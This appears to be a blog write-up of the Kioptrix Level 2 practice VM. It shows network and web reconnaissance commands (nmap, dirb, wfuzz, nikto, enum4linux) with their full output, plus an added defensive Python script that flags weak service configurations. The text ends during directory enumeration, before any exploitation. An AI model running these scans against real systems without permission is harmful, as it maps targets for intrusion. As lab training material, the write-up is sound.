Tuesday, 16 August 2016

Kioptrix Level 2


Scenario: let's try this:
netdiscover -r 192.168.180.0/24
nmap -sV -T4 -O -F --version-light 192.168.180.138
nmap -sC -sS -T4 -A -v -v -Pn 192.168.180.138
nmap -sC -sU -T4 -A -v -v -Pn --top-ports 200 192.168.180.138
dirb http://192.168.180.138
wfuzz -c -z file,/usr/share/wfuzz/wordlist/general/big.txt --hc 404 http://192.168.180.138/FUZZ
nikto -h 192.168.180.138

In case there is SMB:
smbclient -N -L 192.168.180.138
enum4linux -a 192.168.180.138


netdiscover -r 192.168.180.0/24

 Currently scanning: Finished!   |   Screen View: Unique Hosts                 
                                                                               
 4 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 240               
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.180.1   00:50:56:c0:00:08      1      60  VMware, Inc.                
 192.168.180.2   00:50:56:f9:f6:4a      1      60  VMware, Inc.                
 192.168.180.138 00:0c:29:04:7c:66      1      60  VMware, Inc.                
 192.168.180.254 00:50:56:fa:45:3e      1      60  VMware, Inc.        


nmap -sV -T4 -O -F --version-light 192.168.180.138

Starting Nmap 7.01 ( https://nmap.org ) at 2016-08-09 01:49 EDT
Nmap scan report for 192.168.180.138
Host is up (0.00015s latency).
Not shown: 94 closed ports
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 3.9p1 (protocol 1.99)
80/tcp   open  http     Apache httpd 2.0.52 ((CentOS))
111/tcp  open  rpcbind
443/tcp  open  ssl/http Apache httpd 2.0.52 ((CentOS))
631/tcp  open  ipp      CUPS 1.1
3306/tcp open  mysql    MySQL (unauthorized)
MAC Address: 00:0C:29:04:7C:66 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.30
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.46 seconds

nmap -sC -sS -T4 -A -v -v -Pn 192.168.180.138

Starting Nmap 7.01 ( https://nmap.org ) at 2016-08-09 01:50 EDT
NSE: Loaded 132 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 01:50
Completed NSE at 01:50, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 01:50
Completed NSE at 01:50, 0.00s elapsed
Initiating ARP Ping Scan at 01:50
Scanning 192.168.180.138 [1 port]
Completed ARP Ping Scan at 01:50, 0.02s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 01:50
Completed Parallel DNS resolution of 1 host. at 01:50, 13.00s elapsed
Initiating SYN Stealth Scan at 01:50
Scanning 192.168.180.138 [1000 ports]
Discovered open port 80/tcp on 192.168.180.138
Discovered open port 443/tcp on 192.168.180.138
Discovered open port 3306/tcp on 192.168.180.138
Discovered open port 111/tcp on 192.168.180.138
Discovered open port 22/tcp on 192.168.180.138
Discovered open port 631/tcp on 192.168.180.138
Discovered open port 843/tcp on 192.168.180.138
Completed SYN Stealth Scan at 01:50, 0.04s elapsed (1000 total ports)
Initiating Service scan at 01:50
Scanning 7 services on 192.168.180.138
Completed Service scan at 01:51, 12.03s elapsed (7 services on 1 host)
Initiating OS detection (try #1) against 192.168.180.138
NSE: Script scanning 192.168.180.138.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 01:51
Completed NSE at 01:51, 2.13s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 01:51
Completed NSE at 01:51, 0.00s elapsed
Nmap scan report for 192.168.180.138
Host is up, received arp-response (0.00015s latency).
Scanned at 2016-08-09 01:50:35 EDT for 29s
Not shown: 993 closed ports
Reason: 993 resets
PORT     STATE SERVICE  REASON         VERSION
22/tcp   open  ssh      syn-ack ttl 64 OpenSSH 3.9p1 (protocol 1.99)
| ssh-hostkey: 
|   1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1)
| 1024 35 149174282886581624883868648302761292182406879108668063702143177994710569161669502445416601666211201346192352271911333433971833283425439634231257314174441054335295864218587993634534355128377261436615077053235666774641007412196140534221696911370388178873572900977872600139866890316021962605461192127591516843621
|   1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA)
| ssh-dss AAAAB3NzaC1kc3MAAACBAOWJ2N2BPBPm0HxCi630ZxHtTNMh+uVkeYCkKVNxavZkcJdpfFTOGZp054sj27mVZVtCeNMHhzAUpvRisn/cH4k4plLd1m8HACAVPtcgRrshCzb7wzQikrP+byCVypE0RpkQcDya+ngDMVzrkA+9KQSR/5W6BjldLW60A5oZgyfvAAAAFQC/iRZe4LlaYXwHvYYDpjnoCPY3xQAAAIBKFGl/zr/u1JxCV8a9dIAMIE0rk0jYtwvpDCdBre450ruoLII/hsparzdJs898SMWX1kEzigzUdtobDVT8nWdJAVRHCm8ruy4IQYIdtjYowXD7hxZTy/F0xOsiTRWBYMQPe8lW1oA+xabqlnCO3ppjmBecVlCwEMoeefnwGWAkxwAAAIAKajcioQiMDYW7veV13Yjmag6wyIia9+V9aO8JmgMi3cNr04Vl0FF+n7OIZ5QYvpSKcQgRzwNylEW5juV0Xh96m2g3rqEvDd4kTttCDlOltPgP6q6Z8JI0IGzcIGYBy6UWdIxj9D7F2ccc7fAM2o22+qgFp+FFiLeFDVbRhYz4sg==
|   1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA)
|_ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA4j5XFFw9Km2yphjpu1gzDBglGSpMxtR8zOvpH9gUbOMXXbCQeXgOK3rs4cs/j75G54jALm99Ky7tgToNaEuxmQmwnpYk9bntoDu9SkiT/hPZdOwq40yrfWIHzlUNWTpY3okTdf/YNUAdl4NOBOYbf0x/dsAdHHqSWnvZmruFA6M=
|_sshv1: Server supports SSHv1
80/tcp   open  http     syn-ack ttl 64 Apache httpd 2.0.52 ((CentOS))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
111/tcp  open  rpcbind  syn-ack ttl 64 2 (RPC #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100024  1            840/udp  status
|_  100024  1            843/tcp  status
443/tcp  open  ssl/http syn-ack ttl 64 Apache httpd 2.0.52 ((CentOS))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--/localityName=SomeCity/emailAddress=root@localhost.localdomain/organizationalUnitName=SomeOrganizationalUnit
| Issuer: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--/localityName=SomeCity/emailAddress=root@localhost.localdomain/organizationalUnitName=SomeOrganizationalUnit
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: md5WithRSAEncryption
| Not valid before: 2009-10-08T00:10:47
| Not valid after:  2010-10-08T00:10:47
| MD5:   01de 29f9 fbfb 2eb2 beaf e624 3157 090f
| SHA-1: 560c 9196 6506 fb0f fb81 66b1 ded3 ac11 2ed4 808a
| -----BEGIN CERTIFICATE-----
| MIIEDDCCA3WgAwIBAgIBADANBgkqhkiG9w0BAQQFADCBuzELMAkGA1UEBhMCLS0x
| EjAQBgNVBAgTCVNvbWVTdGF0ZTERMA8GA1UEBxMIU29tZUNpdHkxGTAXBgNVBAoT
| EFNvbWVPcmdhbml6YXRpb24xHzAdBgNVBAsTFlNvbWVPcmdhbml6YXRpb25hbFVu
| aXQxHjAcBgNVBAMTFWxvY2FsaG9zdC5sb2NhbGRvbWFpbjEpMCcGCSqGSIb3DQEJ
| ARYacm9vdEBsb2NhbGhvc3QubG9jYWxkb21haW4wHhcNMDkxMDA4MDAxMDQ3WhcN
| MTAxMDA4MDAxMDQ3WjCBuzELMAkGA1UEBhMCLS0xEjAQBgNVBAgTCVNvbWVTdGF0
| ZTERMA8GA1UEBxMIU29tZUNpdHkxGTAXBgNVBAoTEFNvbWVPcmdhbml6YXRpb24x
| HzAdBgNVBAsTFlNvbWVPcmdhbml6YXRpb25hbFVuaXQxHjAcBgNVBAMTFWxvY2Fs
| aG9zdC5sb2NhbGRvbWFpbjEpMCcGCSqGSIb3DQEJARYacm9vdEBsb2NhbGhvc3Qu
| bG9jYWxkb21haW4wgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAN4duNVEr4aL
| TUfsjacXKcCaRs1oTxsdNTIxkp7SV2PDD+mBY5shsXt/FMG7Upf4g605+W6ZEhfB
| WpLXonDFaRIxxn4AGSOLg8q20kUt9p2HZufaSLSwfSwJ+CTMwYtN8AU0jhf3r0y8
| jr+jjEU0HT4O4YXcnDRvbIUeHKedPPsTAgMBAAGjggEcMIIBGDAdBgNVHQ4EFgQU
| QAs+OwqZIYsWClQ2ZBav2uPP/mAwgegGA1UdIwSB4DCB3YAUQAs+OwqZIYsWClQ2
| ZBav2uPP/mChgcGkgb4wgbsxCzAJBgNVBAYTAi0tMRIwEAYDVQQIEwlTb21lU3Rh
| dGUxETAPBgNVBAcTCFNvbWVDaXR5MRkwFwYDVQQKExBTb21lT3JnYW5pemF0aW9u
| MR8wHQYDVQQLExZTb21lT3JnYW5pemF0aW9uYWxVbml0MR4wHAYDVQQDExVsb2Nh
| bGhvc3QubG9jYWxkb21haW4xKTAnBgkqhkiG9w0BCQEWGnJvb3RAbG9jYWxob3N0
| LmxvY2FsZG9tYWluggEAMAwGA1UdEwQFMAMBAf8wDQYJKoZIhvcNAQEEBQADgYEA
| Hvq7KPeUTn36Sz/Au95TmC7aSkhIkGVHMRGhWe7KTEflqQffYTqJOS4xsu/FxDRy
| 9IGOapsyILGEx57apuCYJW3tpwMUrpUXu/x9g3LM+VghiH0XxMOfbueVhqWZ+yP8
| LisROr5u+FeGOBBIINAmpWUX2xEdB4p97WYzP03rEQU=
|_-----END CERTIFICATE-----
|_ssl-date: 2016-08-09T02:41:19+00:00; -3h09m45s from scanner time.
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC2_CBC_128_CBC_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|     SSL2_RC4_64_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_RC2_CBC_128_CBC_WITH_MD5
|_    SSL2_RC4_128_EXPORT40_WITH_MD5
631/tcp  open  ipp      syn-ack ttl 64 CUPS 1.1
| http-methods: 
|   Supported Methods: GET HEAD OPTIONS POST PUT
|_  Potentially risky methods: PUT
|_http-server-header: CUPS/1.1
|_http-title: 403 Forbidden
843/tcp  open  status   syn-ack ttl 64 1 (RPC #100024)
3306/tcp open  mysql    syn-ack ttl 64 MySQL (unauthorized)
MAC Address: 00:0C:29:04:7C:66 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.30
TCP/IP fingerprint:
OS:SCAN(V=7.01%E=4%D=8/9%OT=22%CT=1%CU=38334%PV=Y%DS=1%DC=D%G=Y%M=000C29%TM
OS:=57A96F48%P=i586-pc-linux-gnu)SEQ(SP=C4%GCD=1%ISR=C6%TI=Z%CI=Z%II=I%TS=A
OS:)OPS(O1=M5B4ST11NW2%O2=M5B4ST11NW2%O3=M5B4NNT11NW2%O4=M5B4ST11NW2%O5=M5B
OS:4ST11NW2%O6=M5B4ST11)WIN(W1=16A0%W2=16A0%W3=16A0%W4=16A0%W5=16A0%W6=16A0
OS:)ECN(R=Y%DF=Y%T=40%W=16D0%O=M5B4NNSNW2%CC=N%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+
OS:%F=AS%RD=0%Q=)T2(R=N)T3(R=Y%DF=Y%T=40%W=16A0%S=O%A=S+%F=AS%O=M5B4ST11NW2
OS:%RD=0%Q=)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=
OS:0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T
OS:7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN
OS:=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Uptime guess: 0.003 days (since Tue Aug  9 01:47:22 2016)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=196 (Good luck!)
IP ID Sequence Generation: All zeros

TRACEROUTE
HOP RTT     ADDRESS
1   0.15 ms 192.168.180.138

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 01:51
Completed NSE at 01:51, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 01:51
Completed NSE at 01:51, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 29.42 seconds
           Raw packets sent: 1020 (45.626KB) | Rcvd: 1016 (41.366KB)


nmap -sC -sU -T4 -A -v -v -Pn --top-ports 200 192.168.180.138

Starting Nmap 7.01 ( https://nmap.org ) at 2016-08-09 01:52 EDT
PORT      STATE         SERVICE        REASON              VERSION
68/udp    open|filtered dhcpc          no-response
111/udp   open          rpcbind        udp-response ttl 64 2 (RPC #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100024  1            840/udp  status
|_  100024  1            843/tcp  status
631/udp   open|filtered ipp            no-response
683/udp   open|filtered corba-iiop     no-response
1021/udp  open|filtered exp1           no-response
1024/udp  open|filtered unknown        no-response
1054/udp  open|filtered brvread        no-response
6971/udp  open|filtered unknown        no-response
9020/udp  open|filtered tambora        no-response
17018/udp open|filtered unknown        no-response
18228/udp open|filtered unknown        no-response
19956/udp open|filtered unknown        no-response
20309/udp open|filtered unknown        no-response
20665/udp open|filtered unknown        no-response
21298/udp open|filtered unknown        no-response
22739/udp open|filtered unknown        no-response
26966/udp open|filtered unknown        no-response
29823/udp open|filtered unknown        no-response
30303/udp open|filtered unknown        no-response
32771/udp open|filtered sometimes-rpc6 no-response
47624/udp open|filtered directplaysrvr no-response
49156/udp open|filtered unknown        no-response
49393/udp open|filtered unknown        no-response
60423/udp open|filtered unknown        no-response
MAC Address: 00:0C:29:04:7C:66 (VMware)
Too many fingerprints match this host to give specific OS details
TCP/IP fingerprint:
SCAN(V=7.01%E=4%D=8/9%OT=%CT=%CU=2%PV=Y%DS=1%DC=D%G=N%M=000C29%TM=57A97403%P=i586-pc-linux-gnu)
SEQ(CI=Z%II=I)
T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)
T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)
IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.21 ms 192.168.180.138

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 02:11
Completed NSE at 02:11, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 02:11
Completed NSE at 02:11, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1149.92 seconds
           Raw packets sent: 1574 (46.348KB) | Rcvd: 1071 (61.672KB)
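Before moving on to the web enumeration, here is an added example that is not part of the original write-up: a small Python triage script that reads nmap normal output like the two scans above and flags the weak configurations a defender would want to fix (SSH protocol 1, SSLv2, an MD5-signed and expired certificate, a risky PUT method, and a database port reachable from the scanning host). The sample input is a constructed subset of lines copied from the TCP and UDP scans above; the rule set is my own heuristic, not anything nmap or the Kioptrix author provides, and the `open|filtered` UDP rows are deliberately skipped because nothing confirmed them.

```python
import re
from datetime import datetime

# Constructed sample: lines taken from the nmap output above, trimmed to
# what the triage rules look at. A real run would read the saved -oN file.
SAMPLE_NMAP = """\
22/tcp   open  ssh      syn-ack ttl 64 OpenSSH 3.9p1 (protocol 1.99)
|_sshv1: Server supports SSHv1
80/tcp   open  http     syn-ack ttl 64 Apache httpd 2.0.52 ((CentOS))
|_http-server-header: Apache/2.0.52 (CentOS)
443/tcp  open  ssl/http syn-ack ttl 64 Apache httpd 2.0.52 ((CentOS))
| Signature Algorithm: md5WithRSAEncryption
| Not valid after:  2010-10-08T00:10:47
| sslv2:
|   SSLv2 supported
631/tcp  open  ipp      syn-ack ttl 64 CUPS 1.1
|_  Potentially risky methods: PUT
3306/tcp open  mysql    syn-ack ttl 64 MySQL (unauthorized)
68/udp    open|filtered dhcpc          no-response
"""

# PORT STATE SERVICE [REASON] VERSION; with -v the reason column is present,
# so everything after the service name is kept as free-text "detail".
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s+(.*)$")


def parse_ports(text):
    """Group nmap normal-output lines by port, in scan order.

    Script (NSE) output lines start with '|' and belong to the port line
    that precedes them, so they are attached to the last port seen.
    """
    ports = []
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            ports.append({
                "port": f"{m.group(1)}/{m.group(2)}",
                "state": m.group(3),
                "service": m.group(4),
                "detail": m.group(5).strip(),
                "scripts": [],
            })
        elif line.startswith("|") and ports:
            ports[-1]["scripts"].append(line.lstrip("|_ ").rstrip())
    return ports


def triage(text, scan_date):
    """Return (port, finding) pairs for confirmed-open ports.

    scan_date is an ISO date string ("2016-08-09"); it is only used to
    decide whether a certificate had already expired when the scan ran.
    These rules are a hand-picked heuristic, not an nmap feature.
    """
    scan_day = datetime.strptime(scan_date, "%Y-%m-%d").date()
    findings = []
    for p in parse_ports(text):
        if p["state"] != "open":          # skips open|filtered UDP guesses
            continue
        blob = "\n".join([p["detail"]] + p["scripts"])
        if "protocol 1.99" in p["detail"] or "Server supports SSHv1" in blob:
            findings.append((p["port"], "SSH protocol 1 enabled"))
        if "SSLv2 supported" in blob:
            findings.append((p["port"], "SSLv2 enabled"))
        m = re.search(r"Signature Algorithm:\s*(\S+)", blob)
        if m and m.group(1).lower().startswith(("md5", "sha1")):
            findings.append((p["port"], f"certificate signed with {m.group(1)}"))
        m = re.search(r"Not valid after:\s*(\d{4}-\d{2}-\d{2})", blob)
        if m and datetime.strptime(m.group(1), "%Y-%m-%d").date() < scan_day:
            findings.append((p["port"], f"certificate expired on {m.group(1)}"))
        m = re.search(r"Potentially risky methods:\s*(.+)", blob)
        if m:
            findings.append((p["port"], f"risky HTTP methods allowed: {m.group(1).strip()}"))
        if p["service"] == "mysql":
            findings.append((p["port"], "database port reachable from the scanning host"))
    return findings


if __name__ == "__main__":
    for port, finding in triage(SAMPLE_NMAP, "2016-08-09"):
        print(f"{port:<9} {finding}")
```

Run against the sample it reports six findings, all on ports 22, 443, 631 and 3306; port 80 produces nothing because an old Apache banner alone is not a misconfiguration this script can confirm, and the UDP row is ignored. Feed it `nmap -oN` output from a real scan and the rule list is the place to extend.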


dirb http://192.168.180.138

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Tue Aug  9 02:12:19 2016
URL_BASE: http://192.168.180.138/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.180.138/ ----
+ http://192.168.180.138/cgi-bin/ (CODE:403|SIZE:291)                          
+ http://192.168.180.138/index.php (CODE:200|SIZE:667)                         
==> DIRECTORY: http://192.168.180.138/manual/                                  
+ http://192.168.180.138/usage (CODE:403|SIZE:288)                             
                                                                               
---- Entering directory: http://192.168.180.138/manual/ ----
==> DIRECTORY: http://192.168.180.138/manual/de/                               
==> DIRECTORY: http://192.168.180.138/manual/developer/                        
==> DIRECTORY: http://192.168.180.138/manual/en/                               
==> DIRECTORY: http://192.168.180.138/manual/faq/                              
==> DIRECTORY: http://192.168.180.138/manual/fr/                               
==> DIRECTORY: http://192.168.180.138/manual/howto/                            
==> DIRECTORY: http://192.168.180.138/manual/images/                           
+ http://192.168.180.138/manual/index.html (CODE:200|SIZE:7234)                
==> DIRECTORY: http://192.168.180.138/manual/ja/                               
==> DIRECTORY: http://192.168.180.138/manual/ko/                               
+ http://192.168.180.138/manual/LICENSE (CODE:200|SIZE:11358)                  
==> DIRECTORY: http://192.168.180.138/manual/misc/                             
==> DIRECTORY: http://192.168.180.138/manual/mod/                              
==> DIRECTORY: http://192.168.180.138/manual/programs/                         
==> DIRECTORY: http://192.168.180.138/manual/ru/                               
==> DIRECTORY: http://192.168.180.138/manual/ssl/                              
==> DIRECTORY: http://192.168.180.138/manual/style/                            
                                                                               
---- Entering directory: http://192.168.180.138/manual/de/ ----
+ http://192.168.180.138/manual/de/de (CODE:301|SIZE:321)                      
==> DIRECTORY: http://192.168.180.138/manual/de/developer/                     
+ http://192.168.180.138/manual/de/en (CODE:301|SIZE:321)                      
==> DIRECTORY: http://192.168.180.138/manual/de/faq/                           
+ http://192.168.180.138/manual/de/fr (CODE:301|SIZE:321)                      
==> DIRECTORY: http://192.168.180.138/manual/de/howto/                         
==> DIRECTORY: http://192.168.180.138/manual/de/images/                        
+ http://192.168.180.138/manual/de/index.html (CODE:200|SIZE:7317)             
+ http://192.168.180.138/manual/de/ja (CODE:301|SIZE:321)                      
+ http://192.168.180.138/manual/de/ko (CODE:301|SIZE:321)                      
+ http://192.168.180.138/manual/de/LICENSE (CODE:200|SIZE:11358)               
==> DIRECTORY: http://192.168.180.138/manual/de/misc/                          
==> DIRECTORY: http://192.168.180.138/manual/de/mod/                           
==> DIRECTORY: http://192.168.180.138/manual/de/programs/                      
+ http://192.168.180.138/manual/de/ru (CODE:301|SIZE:321)                      
==> DIRECTORY: http://192.168.180.138/manual/de/ssl/                           
==> DIRECTORY: http://192.168.180.138/manual/de/style/                         
                                                                               
---- Entering directory: http://192.168.180.138/manual/developer/ ----
+ http://192.168.180.138/manual/developer/index.html (CODE:200|SIZE:4770)      
                                                                               
---- Entering directory: http://192.168.180.138/manual/en/ ----
+ http://192.168.180.138/manual/en/de (CODE:301|SIZE:321)                      
==> DIRECTORY: http://192.168.180.138/manual/en/developer/                     
+ http://192.168.180.138/manual/en/en (CODE:301|SIZE:321)                      
==> DIRECTORY: http://192.168.180.138/manual/en/faq/                           
+ http://192.168.180.138/manual/en/fr (CODE:301|SIZE:321)                      
==> DIRECTORY: http://192.168.180.138/manual/en/howto/                         
==> DIRECTORY: http://192.168.180.138/manual/en/images/                        
+ http://192.168.180.138/manual/en/index.html (CODE:200|SIZE:7234)             
+ http://192.168.180.138/manual/en/ja (CODE:301|SIZE:321)                      
+ http://192.168.180.138/manual/en/ko (CODE:301|SIZE:321)                      
+ http://192.168.180.138/manual/en/LICENSE (CODE:200|SIZE:11358)               
==> DIRECTORY: http://192.168.180.138/manual/en/misc/                          
==> DIRECTORY: http://192.168.180.138/manual/en/mod/                           
==> DIRECTORY: http://192.168.180.138/manual/en/programs/                      
+ http://192.168.180.138/manual/en/ru (CODE:301|SIZE:321)                      
==> DIRECTORY: http://192.168.180.138/manual/en/ssl/                           
==> DIRECTORY: http://192.168.180.138/manual/en/style/                         
                                                                               
---- Entering directory: http://192.168.180.138/manual/faq/ ----
+ http://192.168.180.138/manual/faq/index.html (CODE:200|SIZE:3564)            
                                                                               
---- Entering directory: http://192.168.180.138/manual/fr/ ----
+ http://192.168.180.138/manual/fr/de (CODE:301|SIZE:321)                      
==> DIRECTORY: http://192.168.180.138/manual/fr/developer/                     
+ http://192.168.180.138/manual/fr/en (CODE:301|SIZE:321)                      
==> DIRECTORY: http://192.168.180.138/manual/fr/faq/                           
+ http://192.168.180.138/manual/fr/fr (CODE:301|SIZE:321)                      
==> DIRECTORY: http://192.168.180.138/manual/fr/howto/                         
==> DIRECTORY: http://192.168.180.138/manual/fr/images/                        
+ http://192.168.180.138/manual/fr/index.html (CODE:200|SIZE:7234)             
+ http://192.168.180.138/manual/fr/ja (CODE:301|SIZE:321)                      
+ http://192.168.180.138/manual/fr/ko (CODE:301|SIZE:321)                      
+ http://192.168.180.138/manual/fr/LICENSE (CODE:200|SIZE:11358)               
==> DIRECTORY: http://192.168.180.138/manual/fr/misc/                          
==> DIRECTORY: http://192.168.180.138/manual/fr/mod/                           
==> DIRECTORY: http://192.168.180.138/manual/fr/programs/                      
+ http://192.168.180.138/manual/fr/ru (CODE:301|SIZE:321)                      
==> DIRECTORY: http://192.168.180.138/manual/fr/ssl/                           
==> DIRECTORY: http://192.168.180.138/manual/fr/style/                         
                                                                               
---- Entering directory: http://192.168.180.138/manual/howto/ ----
+ http://192.168.180.138/manual/howto/index.html (CODE:200|SIZE:5685)          
                                                                               
---- Entering directory: http://192.168.180.138/manual/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
---- Entering directory: http://192.168.180.138/manual/ja/ ----
+ http://192.168.180.138/manual/ja/de (CODE:301|SIZE:321)                      
==> DIRECTORY: http://192.168.180.138/manual/ja/developer/                     
+ http://192.168.180.138/manual/ja/en (CODE:301|SIZE:321)                      
==> DIRECTORY: http://192.168.180.138/manual/ja/faq/                           
+ http://192.168.180.138/manual/ja/fr (CODE:301|SIZE:321)                      
==> DIRECTORY: http://192.168.180.138/manual/ja/howto/                         
==> DIRECTORY: http://192.168.180.138/manual/ja/images/                        
+ http://192.168.180.138/manual/ja/index.html (CODE:200|SIZE:7227)             
+ http://192.168.180.138/manual/ja/ja (CODE:301|SIZE:321)                      
+ http://192.168.180.138/manual/ja/ko (CODE:301|SIZE:321)                      
+ http://192.168.180.138/manual/ja/LICENSE (CODE:200|SIZE:11358)               
==> DIRECTORY: http://192.168.180.138/manual/ja/misc/                          
==> DIRECTORY: http://192.168.180.138/manual/ja/mod/                           
==> DIRECTORY: http://192.168.180.138/manual/ja/programs/                      
+ http://192.168.180.138/manual/ja/ru (CODE:301|SIZE:321)                      
==> DIRECTORY: http://192.168.180.138/manual/ja/ssl/                           
==> DIRECTORY: http://192.168.180.138/manual/ja/style/                         
                                                                               
---- Entering directory: http://192.168.180.138/manual/ko/ ----
+ http://192.168.180.138/manual/ko/de (CODE:301|SIZE:321)                      
==> DIRECTORY: http://192.168.180.138/manual/ko/developer/                     
+ http://192.168.180.138/manual/ko/en (CODE:301|SIZE:321)                      
==> DIRECTORY: http://192.168.180.138/manual/ko/faq/                           
+ http://192.168.180.138/manual/ko/fr (CODE:301|SIZE:321)                      
==> DIRECTORY: http://192.168.180.138/manual/ko/howto/                         
==> DIRECTORY: http://192.168.180.138/manual/ko/images/                        
+ http://192.168.180.138/manual/ko/index.html (CODE:200|SIZE:6954)             
+ http://192.168.180.138/manual/ko/ja (CODE:301|SIZE:321)                      
+ http://192.168.180.138/manual/ko/ko (CODE:301|SIZE:321)                      
+ http://192.168.180.138/manual/ko/LICENSE (CODE:200|SIZE:11358)               
==> DIRECTORY: http://192.168.180.138/manual/ko/misc/                          
==> DIRECTORY: http://192.168.180.138/manual/ko/mod/                           
==> DIRECTORY: http://192.168.180.138/manual/ko/programs/                      
+ http://192.168.180.138/manual/ko/ru (CODE:301|SIZE:321)                      
==> DIRECTORY: http://192.168.180.138/manual/ko/ssl/                           
==> DIRECTORY: http://192.168.180.138/manual/ko/style/                         
                                                                               
---- Entering directory: http://192.168.180.138/manual/misc/ ----
+ http://192.168.180.138/manual/misc/index.html (CODE:200|SIZE:5491)           
                                                                               
---- Entering directory: http://192.168.180.138/manual/mod/ ----
+ http://192.168.180.138/manual/mod/index.html (CODE:200|SIZE:13437)           
                                                                               
---- Entering directory: http://192.168.180.138/manual/programs/ ----
+ http://192.168.180.138/manual/programs/index.html (CODE:200|SIZE:4664)       
                                                                               
---- Entering directory: http://192.168.180.138/manual/ru/ ----
+ http://192.168.180.138/manual/ru/de (CODE:301|SIZE:321)                      
==> DIRECTORY: http://192.168.180.138/manual/ru/developer/                     
+ http://192.168.180.138/manual/ru/en (CODE:301|SIZE:321)                      
==> DIRECTORY: http://192.168.180.138/manual/ru/faq/                           
+ http://192.168.180.138/manual/ru/fr (CODE:301|SIZE:321)                      
==> DIRECTORY: http://192.168.180.138/manual/ru/howto/                         
==> DIRECTORY: http://192.168.180.138/manual/ru/images/                        
+ http://192.168.180.138/manual/ru/index.html (CODE:200|SIZE:7277)             
+ http://192.168.180.138/manual/ru/ja (CODE:301|SIZE:321)                      
+ http://192.168.180.138/manual/ru/ko (CODE:301|SIZE:321)                      
+ http://192.168.180.138/manual/ru/LICENSE (CODE:200|SIZE:11358)               
==> DIRECTORY: http://192.168.180.138/manual/ru/misc/                          
==> DIRECTORY: http://192.168.180.138/manual/ru/mod/                           
==> DIRECTORY: http://192.168.180.138/manual/ru/programs/                      
